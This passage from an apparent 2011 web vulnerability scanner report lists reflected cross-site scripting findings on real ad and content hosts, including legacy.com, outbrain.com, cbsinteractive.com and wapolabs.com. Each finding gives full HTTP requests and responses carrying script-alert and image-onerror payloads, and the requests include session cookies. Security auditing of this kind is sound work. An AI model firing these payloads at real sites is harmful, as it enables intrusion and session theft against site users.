Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.06e8a5"><script>alert(1)</script>8134445c0f1/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.226. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8d1"><script>alert(1)</script>4a5700d9774 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.12d8d1"><script>alert(1)</script>4a5700d9774/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.12d8d1"><script>alert(1)</script>4a5700d9774/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.227. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79373"><script>alert(1)</script>4ced219a5aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/136911479373"><script>alert(1)</script>4ced219a5aa/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/136911479373"><script>alert(1)</script>4ced219a5aa/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.228. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d71e"><script>alert(1)</script>80dfd50a855 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/04d71e"><script>alert(1)</script>80dfd50a855/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/04d71e"><script>alert(1)</script>80dfd50a855/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.229. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97d12"><script>alert(1)</script>21c00572e4f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-197d12"><script>alert(1)</script>21c00572e4f/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-197d12"><script>alert(1)</script>21c00572e4f/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.230. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdaed"><script>alert(1)</script>bf9c26a8d19 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-1/sizefdaed"><script>alert(1)</script>bf9c26a8d19=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-1/sizefdaed"><script>alert(1)</script>bf9c26a8d19=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039;adiframe=y">
...[SNIP]...

1.231. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [alias parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The value of the alias request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35ae5"><script>alert(1)</script>bae12da53c4 was submitted in the alias parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=549974103935ae5"><script>alert(1)</script>bae12da53c4 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 323

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=549974103935ae5"><script>alert(1)</script>bae12da53c4;adiframe=y">
...[SNIP]...

1.232. http://media2.legacy.com/adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43184"><script>alert(1)</script>268ab098d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039&43184"><script>alert(1)</script>268ab098d45=1 HTTP/1.1
Host: media2.legacy.com
Proxy-Connection: keep-alive
Referer: http://www.legacy.com/NS/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2042163798-1297527399993; JEB2=4D56AE8F6E651A440C6EAF39F0016474; __utmz=179553081.1297527408.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=179553081.1849741654.1297527408.1297527408.1297527408.1; UnicaNIODID=L1klHywCE1s-W0TKzur

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 326

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://media2.legacy.com/addyn/3.0/5306.1/1369114/0/-1/size=728x90/adtech;alias=legacy.legacy.home.728x90.1.1;target=_blank;grp=1473244827;misc=5499741039&43184"><script>alert(1)</script>268ab098d45=1;adiframe=y">
...[SNIP]...

1.233. http://odb.outbrain.com/utils/get [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a0654<script>alert(1)</script>49c55aa1899 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /utils/get?url=http%3A%2F%2Fuk.reuters.com%2Farticle%2FidUKTRE71C1YB20110213&callback=outbrain_rater.returnedOdbData(${json},0)a0654<script>alert(1)</script>49c55aa1899&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=34100&ref=&apv=false&rand=0.5271956750657409&sig=Ff9vsySQ HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=3c60260a-1d8b-4ff2-80ef-7d4e1a46ea5e; _lvs2="Z5ekOTFEcZgntHcTxW2I63QfcUoUv0qhtWmjNsOQ6c0="; _lvd2="uvYbqndUp4oGL81GggzPAj9NbxhOHOrBfGWrvBU5HcM="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1297647380027; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="Z5ekOTFEcZgntHcTxW2I63QfcUoUv0qhlLidDM1W/uGQlaVAQ/tI3Q=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 12-Mar-2012 01:36:20 GMT; Path=/
Set-Cookie: _lvd2="uvYbqndUp4oGL81GggzPAj9NbxhOHOrBq0wY9bjkiCMEtu+eLYf3CQ=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sun, 20-Feb-2011 14:24:20 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 12-Mar-2012 01:36:20 GMT; Path=/
Set-Cookie: recs-98b44cb774fd02fd18559597da304954="bPmNSD4EdkQfTcxXO3IbzODj1tUcqGdac9Y1u51O9pcWTxMsM4Sk+CRl0Q8Po4rSMcGqA6kc4x3UMdgdNIMGwS2VLb3EJlEUkzVk0Zh4eYV1v5FjLMguSOtw5rpmzPNIhDKxqp7mHEZ5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 14-Feb-2011 01:41:20 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:36:19 GMT
Content-Length: 9775

outbrain_rater.returnedOdbData({'response':{'exec_time':25,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'187236313','req_id':'0d5dd9641c563b2519e3826e3e34503f'},'score':{'preferred
...[SNIP]...
<\/span>','raterMode':'none','defaultRecNumber':5}}},0)a0654<script>alert(1)</script>49c55aa1899

1.234. http://offers-service.cbsinteractive.com/offers/script.sc [offerId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers-service.cbsinteractive.com
Path:   /offers/script.sc

Issue detail

The value of the offerId request parameter is copied into the HTML document as plain text between tags. The payload 4b9c2<script>alert(1)</script>e6884640a74 was submitted in the offerId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /offers/script.sc?offerId=864b9c2<script>alert(1)</script>e6884640a74 HTTP/1.1
Host: offers-service.cbsinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 88
Date: Mon, 14 Feb 2011 01:39:38 GMT

// Offer id 864b9c2<script>alert(1)</script>e6884640a74 does not exists or is not ACTIVE

1.235. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload f4578<script>alert(1)</script>ead23a8fea2 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325f4578<script>alert(1)</script>ead23a8fea2&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:01 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1203

jsonp1297647421325f4578<script>alert(1)</script>ead23a8fea2({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","date
...[SNIP]...

1.236. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [assocId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the assocId request parameter is copied into the HTML document as plain text between tags. The payload b9198<img%20src%3da%20onerror%3dalert(1)>2e70df75fb1 was submitted in the assocId parameter. This input was echoed as b9198<img src=a onerror=alert(1)>2e70df75fb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20b9198<img%20src%3da%20onerror%3dalert(1)>2e70df75fb1&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:05 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1206

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20b9198<img src=a onerror=alert(1)>2e70df75fb1","commercialNode":"politics","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","key
...[SNIP]...

1.237. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [commercialNode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the commercialNode request parameter is copied into the HTML document as plain text between tags. The payload 65d5f<img%20src%3da%20onerror%3dalert(1)>139c3531da8 was submitted in the commercialNode parameter. This input was echoed as 65d5f<img src=a onerror=alert(1)>139c3531da8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RevenuePlatform/ad/generate?&callback=jsonp1297647421325&format=json&url=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&assocId=wapo-20&keywords=politics&divClass=washpost-bigbox&numLinks=4&showImages=true&width=auto&height=auto&contentId=profile-page&loadingInlineStyles=display%3Anone%3B&container=wapoLabsPromoBox2&cssUrl=null&visId=&userId=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&commercialNode=politics65d5f<img%20src%3da%20onerror%3dalert(1)>139c3531da8&wapo_vis_id=null&wapo_login_id=null&s_vi=%5BCS%5Dv1%7C26AC438B850103D6-4000010D4000193E%5BCE%5D&da.userAgent=Mozilla%2F5.0+(Windows%3B+U%3B+Windows+NT+6.1%3B+en-US)+AppleWebKit%2F534.13+(KHTML%2C+like+Gecko)+Chrome%2F9.0.597.98+Safari%2F534.13&da.userLanguage=en-US HTTP/1.1
Host: oscar.wapolabs.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Date: Mon, 14 Feb 2011 01:39:09 GMT
Server: GlassFish v3
X-Powered-By: Servlet/3.0
Connection: keep-alive
Content-Length: 1250

jsonp1297647421325({"links":[],"data":{"class":"com.wapo.revenue.RevPlatformData","id":null,"assocId":"wapo-20","commercialNode":"politics65d5f<img src=a onerror=alert(1)>139c3531da8","container":"wapoLabsPromoBox2","content":null,"contentId":"profile-page","dateCreated":null,"divClass":"washpost-bigbox","finderOptions":null,"heightInPixels":"auto","keywords":"politics","section":
...[SNIP]...

1.238. http://oscar.wapolabs.com/RevenuePlatform/ad/generate [container parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oscar.wapolabs.com
Path:   /RevenuePlatform/ad/generate

Issue detail

The value of the container request parameter is copied into the HTML document as plain text between tags. The payload ec713<img%20src%3da%20onerror%3dalert(1)>307e13bd033 was submitted in the container parameter. This input was echoed as ec713<img src=a onerror=alert(1)>307e13bd033 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request